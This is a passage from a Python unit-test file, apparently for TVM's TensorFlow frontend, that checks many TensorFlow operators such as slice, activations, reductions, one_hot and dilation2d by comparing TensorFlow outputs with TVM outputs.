_test_forward_transpose((2, 3, 4, 5), (3, 0, 1, 2))
_test_forward_tranapose_axes_input((2, 3, 4), (1, 2, 0))
_test_forward_tranapose_axes_input((2, 3, 4, 5), (3, 0, 1, 2))
def _test_forward_slice_operation_input(input_value, begin_value, size_value):
input_data = np.array(input_value, dtype=np.float32)
with tf.Graph().as_default():
input_tensor = tf.placeholder(shape=input_data.shape, dtype=input_data.dtype, name="input")
tf.slice(input_tensor, begin_value, size_value, name="slice_output")
compare_tf_with_tvm([input_data], ["input:0"], "slice_output:0")
def test_forward_slice():
_test_forward_slice_operation_input([1, 1], [0], [2])
_test_forward_slice_operation_input([0, 1, 2, 3], [3], [-1])
_test_forward_slice_operation_input(
[[0, 1, 2, 3], [4, 5, 6, 7]], begin_value=[0, 1], size_value=[-1, -1]
)
def test_forward_ceil():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.ceil(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Ceil:0")
def test_forward_floor():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.floor(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Floor:0")
def test_forward_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.relu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Relu:0", mode=mode)
def test_forward_leaky_relu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
for mode in ["graph_executor", "vm"]:
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.leaky_relu(in1, alpha=0.4)
compare_tf_with_tvm(inp_array, "Placeholder:0", "LeakyRelu:0", mode=mode)
def test_forward_elu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.elu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Elu:0")
def test_forward_selu():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.selu(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Selu:0")
def test_forward_tanh():
ishape = (1, 3, 10, 10)
inp_array = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.nn.tanh(in1)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Tanh:0")
#######################################################################
# Softmax
# -------
def test_forward_softmax():
"""test operator Softmax """
def check_softmax(in_shape, axis, dtype):
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.nn.softmax(in_data, axis=axis, name="Softmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "Softmax:0")
check_softmax((2, 3, 5), 2, "float32")
check_softmax((2, 3, 5), -1, "float32")
#######################################################################
# Tensor
# ------
def test_forward_round():
"""test Round"""
np_data = np.random.uniform(-10, 10, size=(5, 7)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7), name="in_data")
tf.round(in_data, name="round")
compare_tf_with_tvm([np_data], ["in_data:0"], "round:0")
def test_forward_abs():
"""test operator Abs"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.abs(in_data, name="abs")
compare_tf_with_tvm([np_data], ["in_data:0"], "abs:0")
def _test_forward_zeros_like(in_shape, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.zeros_like(in_data, name="zeros_like")
compare_tf_with_tvm([np_data], ["in_data:0"], "zeros_like:0")
def test_forward_zeros_like():
if tf.__version__ < LooseVersion("1.2"):
_test_forward_zeros_like((2, 3), "int32")
_test_forward_zeros_like((2, 3, 5), "int8")
_test_forward_zeros_like((2, 3, 5, 7), "uint16")
_test_forward_zeros_like((2, 3, 11), "float32")
_test_forward_zeros_like((2, 3, 11), "float64")
def test_forward_squared_difference():
ishape = (1, 3, 10, 14)
inp_array_a = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
inp_array_b = np.random.uniform(-5, 5, size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array_a.shape, dtype=inp_array_a.dtype, name="in1")
in2 = tf.placeholder(shape=inp_array_b.shape, dtype=inp_array_b.dtype, name="in2")
out = tf.math.squared_difference(in1, in2)
compare_tf_with_tvm([inp_array_a, inp_array_b], [in1.name, in2.name], out.name)
def _test_forward_reverse_v2(in_shape, axis, dtype):
np_data = np.random.uniform(-10, 10, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.reverse(in_data, axis=[axis], name="reverse")
compare_tf_with_tvm([np_data], ["in_data:0"], "reverse:0")
def test_forward_reverse_v2():
"""test ReverseV2"""
_test_forward_reverse_v2((2, 3), 0, "int32")
_test_forward_reverse_v2((2, 3, 5), 2, "float32")
_test_forward_reverse_v2((2, 3, 5, 7), 1, "float32")
_test_forward_reverse_v2((2, 3, 5), -1, "float64")
_test_forward_reverse_v2((2, 3, 5), -3, "float64")
def test_forward_sign():
"""test Sign"""
np_data = np.random.uniform(-10, 10, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sign(in_data, name="sign")
compare_tf_with_tvm([np_data], ["in_data:0"], "sign:0")
def test_forward_square():
"""test operator Square """
np_data = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.square(in_data, name="square")
compare_tf_with_tvm([np_data], ["in_data:0"], "square:0")
def test_forward_pow_exp():
"""test Pow and Exp """
np_in1 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
np_in2 = np.random.uniform(-2, 2, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in1 = tf.placeholder(tf.float32, (5, 7, 11), name="in1")
in2 = tf.placeholder(tf.float32, (5, 7, 11), name="in2")
out1 = tf.pow(in1, in2, name="pow")
out = tf.exp(in1, name="exp")
compare_tf_with_tvm([np_in1, np_in2], ["in1:0", "in2:0"], "pow:0")
compare_tf_with_tvm([np_in1], ["in1:0"], "exp:0")
def test_forward_unary():
def _test_forward_unary(op, a_min=1, a_max=5, dtype=np.float32):
"""test unary operators"""
np_data = np.random.uniform(a_min, a_max, size=(2, 3, 5)).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, (2, 3, 5), name="in_data")
out = op(in_data)
compare_tf_with_tvm([np_data], ["in_data:0"], out.name)
_test_forward_unary(tf.acos, -1, 1)
_test_forward_unary(tf.asin, -1, 1)
_test_forward_unary(tf.atanh, -1, 1)
_test_forward_unary(tf.sinh)
_test_forward_unary(tf.cosh)
_test_forward_unary(tf.acosh)
_test_forward_unary(tf.asinh)
_test_forward_unary(tf.atan)
_test_forward_unary(tf.sin)
_test_forward_unary(tf.cos)
_test_forward_unary(tf.tan)
_test_forward_unary(tf.tanh)
_test_forward_unary(tf.erf)
_test_forward_unary(tf.log)
_test_forward_unary(tf.log1p)
def test_forward_atan2():
"""test operator tan """
tf.disable_eager_execution()
np_data_1 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
np_data_2 = np.random.uniform(1, 100, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
in_data_1 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_1")
in_data_2 = tf.placeholder(tf.float32, (2, 3, 5), name="in_data_2")
tf.atan2(in_data_1, in_data_2, name="atan2")
compare_tf_with_tvm([np_data_1, np_data_2], ["in_data_1:0", "in_data_2:0"], "atan2:0")
def test_forward_expm1():
"""test operator expm1 """
def _test_forward_expm1(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 10, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.expm1(in_data, name="expm1")
compare_tf_with_tvm([np_data], ["in_data:0"], "expm1:0")
_test_forward_expm1([1, 100])
_test_forward_expm1([1, 10, 10])
_test_forward_expm1([2, 5, 2, 5])
def test_forward_softsign():
"""test operator softsign """
def _test_forward_softsign(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(1, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.nn.softsign(in_data, name="softsign")
compare_tf_with_tvm([np_data], ["in_data:0"], "softsign:0")
_test_forward_softsign([1, 100])
_test_forward_softsign([1, 10, 10])
_test_forward_softsign([2, 5, 2, 5])
def test_forward_rint():
"""test operator rint """
def _test_forward_rint(shape):
tf.disable_eager_execution()
np_data = np.random.uniform(-100, 100, size=shape).astype(np.float32)
tf.reset_default_graph()
in_data = tf.placeholder(tf.float32, shape, name="in_data")
tf.math.rint(in_data, name="rint")
compare_tf_with_tvm([np_data], ["in_data:0"], "rint:0")
_test_forward_rint([100])
_test_forward_rint([1, 100])
_test_forward_rint([1, 10, 10])
_test_forward_rint([2, 5, 2, 5])
def test_forward_negative():
"""test tf operator Neg """
np_data = np.random.uniform(-100, 255, size=(224, 224, 3)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (224, 224, 3), name="in_data")
tf.negative(in_data, name="negative")
compare_tf_with_tvm([np_data], ["in_data:0"], "negative:0")
def test_forward_log_softmax():
"""test operator LogSoftmax"""
np_data = np.random.uniform(1, 100, size=(9, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (9, 11), name="in_data")
tf.math.log_softmax(in_data, name="LogSoftmax")
compare_tf_with_tvm([np_data], ["in_data:0"], "LogSoftmax:0")
def test_forward_softplus():
"""test operator Softplus"""
np_data = np.random.uniform(1, 10, size=(2, 3, 5)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (2, 3, 5), name="in_data")
tf.nn.softplus(in_data, name="softplus")
compare_tf_with_tvm([np_data], ["in_data:0"], "softplus:0")
def test_forward_rsqrt():
"""test Rsqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.rsqrt(in_data, name="rsqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "rsqrt:0")
def test_forward_sqrt():
"""test Sqrt """
np_data = np.random.uniform(1, 100, size=(5, 7, 11)).astype(np.float32)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, (5, 7, 11), name="in_data")
tf.sqrt(in_data, name="sqrt")
compare_tf_with_tvm([np_data], ["in_data:0"], "sqrt:0")
def _test_forward_right_shift(in_shape, dtype):
"""test operator RightShift"""
lh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 8, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.right_shift(lft_data, rgt_data, name="RightShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "RightShift:0")
def test_forward_right_shift():
_test_forward_right_shift((7,), "int32")
_test_forward_right_shift((3, 11), "int16")
def _test_forward_left_shift(in_shape, dtype):
"""test operator LeftShift"""
lh_data = np.random.randint(100, 1000000, size=in_shape).astype(dtype)
rh_data = np.random.randint(1, 3, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, in_shape, name="lft_data")
rgt_data = tf.placeholder(dtype, in_shape, name="rgt_data")
tf.bitwise.left_shift(lft_data, rgt_data, name="LeftShift")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "LeftShift:0")
def test_forward_left_shift():
_test_forward_left_shift((10,), "int32")
_test_forward_left_shift((224, 224, 3), "int16")
#######################################################################
# Mean
# ----
def test_forward_mean():
def check_mean(ishape, **kwargs):
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
tf.keras.backend.mean(in1, **kwargs)
compare_tf_with_tvm(inp_array, "Placeholder:0", "Mean:0", no_gpu=True)
check_mean((10, 8, 16, 32))
check_mean((10, 8, 16, 32), axis=(2, 3))
check_mean((10, 8, 16, 32), axis=(1, 2), keepdims=True)
#######################################################################
# Size
# ----
def test_forward_size():
def check_size(ishape):
np_input = np.random.uniform(size=ishape).astype(np.float32)
# if all dimensions are constant, TF will optimize away size operator into constant
tf_input_shape = list(np_input.shape)
tf_input_shape[0] = None
with tf.Graph().as_default():
input = tf.placeholder(shape=tf_input_shape, dtype=np_input.dtype, name="input")
tf.size(input, name="size")
compare_tf_with_tvm([np_input], ["input:0"], "size:0")
check_size((10, 8, 16, 32))
check_size((10,))
#######################################################################
# All, Any, Max, Min, Prod, variance, std, logsumexp, euclidean_norm
# ------------------------------------------------------------------
def test_forward_reduce():
def _check_op(tf_op, ishape, axis, keepdims, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(in_data, axis=axis, keepdims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_math_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_test_math_op(tf.math.reduce_all, dtypes=["bool"])
_test_math_op(tf.math.reduce_any, dtypes=["bool"])
_test_math_op(tf.math.reduce_max)
_test_math_op(tf.math.reduce_min)
_test_math_op(tf.math.reduce_prod)
_test_math_op(tf.math.reduce_variance, dtypes=["float32"])
_test_math_op(tf.math.reduce_std, dtypes=["float32"])
_test_math_op(tf.math.reduce_logsumexp, dtypes=["float32"])
if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
_test_math_op(tf.math.reduce_euclidean_norm)
#######################################################################
# All, Max, Min
# ------------------------------------------------------------------
def test_forward_raw_reduce():
def _check_op(tf_op, ishape, axis, keepdims, range_axis=False, dtype="float32"):
tf.reset_default_graph()
if dtype == "bool":
np_data = np.random.choice([True, False], size=ishape)
else:
np_data = np.random.uniform(size=ishape).astype(dtype)
if tf_op == tf.math.reduce_prod:
axis = 1
np_data = np_data.reshape(1, -1)
with tf.Graph().as_default():
if range_axis:
axis = tf.range(axis[0], axis[1], axis[2], name="range", dtype="int32")
in_data = tf.placeholder(dtype, name="in_data")
reduce_op = tf_op(input=in_data, axis=axis, keep_dims=keepdims, name="reduce_std")
compare_tf_with_tvm([np_data], ["in_data:0"], reduce_op.name)
def _test_raw_reduce_op(op, dtypes=["int32", "float32"]):
for dtype in dtypes:
_check_op(op, (3, 10), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (8, 16, 32), axis=(-1), keepdims=False, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 3), keepdims=True, dtype=dtype)
_check_op(op, (2, 3, 10, 10), axis=(1, 2), keepdims=True, dtype=dtype)
_check_op(op, (1, 8, 8, 3), axis=(2, 4, 1), keepdims=True, range_axis=True, dtype=dtype)
_check_op(
op, (2, 3, 10, 10), axis=(1, 3, 1), keepdims=True, range_axis=True, dtype=dtype
)
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_raw_reduce_op(tf.raw_ops.All, dtypes=["bool"])
_test_raw_reduce_op(tf.raw_ops.Max)
_test_raw_reduce_op(tf.raw_ops.Min)
#######################################################################
# Relational operators
# --------------------
def _test_forward_rel_op(data, func):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data[0].shape, dtype=data[0].dtype, name="in1")
in2 = tf.placeholder(shape=data[1].shape, dtype=data[1].dtype, name="in2")
op = func(in1, in2, name="op")
out = tf.cast(op, tf.int32, name="out1")
compare_tf_with_tvm([data[0], data[1]], ["in1:0", "in2:0"], "out1:0")
def test_forward_rel_ops():
t1 = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
t2 = np.array([[9, 8, 7], [6, 5, 4], [3, 2, 1]])
_test_forward_rel_op([t1, t2], math_ops.less)
_test_forward_rel_op([t1, t2], math_ops.greater)
_test_forward_rel_op([t1, t2], math_ops.less_equal)
_test_forward_rel_op([t1, t2], math_ops.greater_equal)
_test_forward_rel_op([t1, t2], math_ops.equal)
_test_forward_rel_op([t1, t2], math_ops.not_equal)
#######################################################################
# ExpandDims
# ----------
def _test_forward_expand_dims(data, axis):
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="in1")
out = tf.expand_dims(in1, axis)
compare_tf_with_tvm([data], [in1.name], out.name)
def test_forward_expand_dims():
_test_forward_expand_dims(np.int32(1), 0)
_test_forward_expand_dims(np.array([1]), 0)
_test_forward_expand_dims(np.array([1]), -1)
_test_forward_expand_dims(np.array([[1], [2]]), 0)
_test_forward_expand_dims(np.array([[1], [2]]), 1)
_test_forward_expand_dims(np.array([[1], [2]]), -1)
#######################################################################
# Maximum, Minimum
# ----------------
def test_forward_maximum():
"""test Op Maximum"""
def check_maximum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.maximum(lft_data, rgt_data, name="maximum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "maximum:0")
check_maximum((10, 8, 16, 32), (1,), dtype="int32")
check_maximum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
def test_forward_minimum():
"""test Op Minimum"""
def check_minimum(lh_shape, rh_shape, dtype):
tf.reset_default_graph()
lh_data = np.random.uniform(size=lh_shape).astype(dtype)
rh_data = np.random.uniform(size=rh_shape).astype(dtype)
with tf.Graph().as_default():
lft_data = tf.placeholder(dtype, name="lft_data")
rgt_data = tf.placeholder(dtype, name="rgt_data")
tf.math.minimum(lft_data, rgt_data, name="minimum")
compare_tf_with_tvm([lh_data, rh_data], ["lft_data:0", "rgt_data:0"], "minimum:0")
check_minimum((10, 8, 16, 32), (1,), dtype="int32")
check_minimum((10, 8, 16, 32), (10, 8, 16, 32), dtype="float32")
#######################################################################
# PlaceholderWithDefault
# ----------------------
def test_placeholder():
with tf.Graph().as_default():
in_data1 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
var1 = tf.Variable(in_data1, name="in1")
var2 = array_ops.placeholder_with_default(var1, None, name="place1")
in_data2 = np.random.uniform(-5, 5, size=(3, 4, 5)).astype(np.float32)
place1 = array_ops.placeholder(shape=in_data1.shape, dtype=in_data1.dtype, name="in2")
out1 = tf.math.add(var1, var2, name="out1")
out2 = tf.math.add(out1, place1, name="out2")
compare_tf_with_tvm(
[in_data1, in_data2], ["place1:0", "in2:0"], "out2:0", init_global_variables=True
)
#######################################################################
# OneHot
# ----------------------
def _test_forward_one_hot(indices_shape, depth, on_value, off_value, axis, out_dtype):
inp_array1 = np.random.randint(0, 5, size=indices_shape)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array1.shape, dtype=inp_array1.dtype)
out = tf.one_hot(in1, depth, on_value, off_value, axis, dtype=out_dtype)
compare_tf_with_tvm(inp_array1, in1.name, out.name)
def test_forward_one_hot():
_test_forward_one_hot((3,), 3, 1, 0, -1, "int32")
_test_forward_one_hot((3,), 3, 1.0, 0.0, -1, "float32")
_test_forward_one_hot((2, 2), 5, 2, -2, 0, "int32")
_test_forward_one_hot((2, 2), 5, 0.5, -0.5, 1, "float32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1, 0, 1, "int32")
_test_forward_one_hot((3, 2, 4, 5), 6, 1.0, 0.0, 0, "float32")
#######################################################################
# AddN
# ----------------------
def _test_forward_add_n(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.add_n(temp)
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def test_forward_add_n():
x = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
y = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
z = np.random.randint(1, 100, size=(3, 3, 3), dtype=np.int32)
m, n, o = x.astype(np.float32), y.astype(np.float32), z.astype(np.float32)
in0 = x
in1 = [x, y]
in2 = (x, y, z)
in3 = m
in4 = [m, n]
in5 = (m, n, o)
_test_forward_add_n(in0)
_test_forward_add_n(in1)
_test_forward_add_n(in2)
_test_forward_add_n(in3)
_test_forward_add_n(in4)
_test_forward_add_n(in5)
#######################################################################
# Sharing params case
# ----------------------
def test_sharing_node():
"""Test the sharing params case."""
np_data = np.random.uniform(size=(2, 2, 2)).astype("float32")
with tf.Graph().as_default():
in_data = tf.placeholder(tf.float32, shape=(2, 2, 2), name="in_data")
axis = tf.constant([-1], dtype=tf.int32, name="axis")
mean0 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean0")
mean1 = tf.reduce_mean(in_data, axis=axis, keepdims=False, name="mean1")
out = tf.add(mean0, mean1, name="out")
compare_tf_with_tvm([np_data], ["in_data:0"], "out:0")
#######################################################################
# Unravel Index
# ----------------------
def _test_forward_unravel_index(inputs):
tf.reset_default_graph()
with tf.Graph().as_default():
temp = []
for each in inputs:
temp.append(tf.placeholder(shape=each.shape, dtype=each.dtype))
output = tf.unravel_index(temp[0], temp[1])
compare_tf_with_tvm([each for each in inputs], [each.name for each in temp], output.name)
def _test_forward_unravel_index_scalar(x, y, dtype="int32"):
tf.reset_default_graph()
with tf.Graph().as_default():
indices_1 = constant_op.constant(x, dtype=dtype)
dims_1 = constant_op.constant(y, dtype=dtype)
out_1 = array_ops.unravel_index(indices_1, dims_1)
compare_tf_with_tvm([], [], out_1.name)
def test_forward_unravel_index():
x = np.array([0, 1, 2, 3])
y = np.array([2, 2])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([2, 3])
_test_forward_unravel_index([x, y])
x = np.array([0, 1, 2, 5])
y = np.array([6])
_test_forward_unravel_index([x, y])
x = np.array([102, 300, 16])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
x = np.array([100])
y = np.array([10, 10, 9, 6])
_test_forward_unravel_index([x, y])
# Test scalar input
_test_forward_unravel_index_scalar(13, [1, 4, 5, 2])
#######################################################################
# Dilation2d
# ----------------------
def _test_dilation2d(tensor_in_sizes, filter_in_sizes, strides, dilations, padding):
""" One iteration of dilation2d with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
nn_ops.dilation2d(in_data, in_filter, strides=strides, rates=dilations, padding=padding)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Dilation2D:0",
no_gpu=True,
)
def test_forward_dilation():
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [3, 3, 1], [1, 1, 1, 1], [1, 2, 2, 1], "VALID")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 28, 28, 3], [5, 5, 3], [1, 2, 2, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 1, 1, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 18, 18, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "SAME")
_test_dilation2d([1, 15, 15, 32], [4, 4, 32], [1, 1, 1, 1], [1, 2, 1, 1], "VALID")
_test_dilation2d([1, 5, 5, 1], [7, 2, 1], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 5, 5, 1], [3, 4, 1], [1, 2, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 5, 5, 3], [3, 3, 3], [1, 1, 4, 1], [1, 1, 1, 1], "VALID")
_test_dilation2d([1, 28, 28, 3], [5, 6, 3], [1, 1, 2, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 224, 224, 10], [8, 8, 10], [1, 3, 1, 1], [1, 1, 1, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 2, 2, 1], "SAME")
_test_dilation2d([1, 3, 3, 1], [2, 2, 1], [1, 1, 1, 1], [1, 1, 2, 1], "VALID")
def _test_identityn(data_np_list):
with tf.Graph().as_default():
data_tensors = []
data_tensors_name = []
for index, data_np in enumerate(data_np_list):
tensor_name = f"data_{index}"
data_tensors_name.append(tensor_name + ":0")
data_tensors.append(
tf.placeholder(shape=data_np.shape, dtype=str(data_np.dtype), name=tensor_name)
)
output = tf.identity_n(data_tensors)
output_names = [out.name for out in output]
compare_tf_with_tvm(
data_np_list,
data_tensors_name,
output_names,
)
@pytest.mark.parametrize(
"data_np_list",
[
(
[
np.array([[1, 1], [0, 3], [0, 1], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4, 5], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
]
),
(
[
np.array([[1, 1], [0, 3], [2, 0], [3, 1]], dtype=np.int64),
np.array([1, 2, 3, 4], dtype=np.int64),
np.array([5, 6], dtype=np.int64),
np.array([True, False, True]),
]
),
(
[
np.array([]),
np.array([[]]),
]
),
],
)
def test_forward_identityn(data_np_list):
_test_identityn(data_np_list)
#######################################################################
# infinity ops
# ------------
def _verify_infiniteness_ops(tf_op, name):
"""test operator infinity ops"""
# Only float types are allowed in Tensorflow for isfinite and isinf
# float16 is failing on cuda
tf_dtypes = ["float32", "float64"]
for tf_dtype in tf_dtypes:
shape = (8, 8)
data = np.random.uniform(size=shape).astype(tf_dtype)
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.infty
data.ravel()[np.random.choice(data.size, int(data.size * 0.5), replace=False)] = np.nan
tf.reset_default_graph()
in_data = tf.placeholder(tf_dtype, shape, name="in_data")
tf_op(in_data, name=name)
compare_tf_with_tvm([data], ["in_data:0"], "{}:0".format(name))
def test_forward_isinf():
_verify_infiniteness_ops(tf.is_inf, "isinf")
def test_forward_isfinite():
_verify_infiniteness_ops(tf.is_finite, "isfinite")
def test_forward_isnan():
_verify_infiniteness_ops(tf.is_nan, "isnan")
def _test_spop_placeholder_without_shape_info():
with tf.Graph().as_default():
@function.Defun(*[tf.int32] * 2)
def Forward(x, y):
print(x.name)
print(y.name)
b = tf.add(x, y)
return b
pl1 = tf.placeholder(tf.int32, name="pl1")
pl2 = tf.placeholder(tf.int32, name="pl2")
pl3 = tf.placeholder(tf.int32, name="pl3")
data = np.array([[-1, 1], [2, -2]], dtype=np.int32)
data2 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
data3 = np.array([[-2, 3], [4, -6]], dtype=np.int32)
z1 = gen_functional_ops.StatefulPartitionedCall(args=[pl1, pl2], Tout=[tf.int32], f=Forward)
z2 = z1 + pl3
compare_tf_with_tvm(
[data, data2, data3],
["pl1:0", "pl2:0", "pl3:0"],
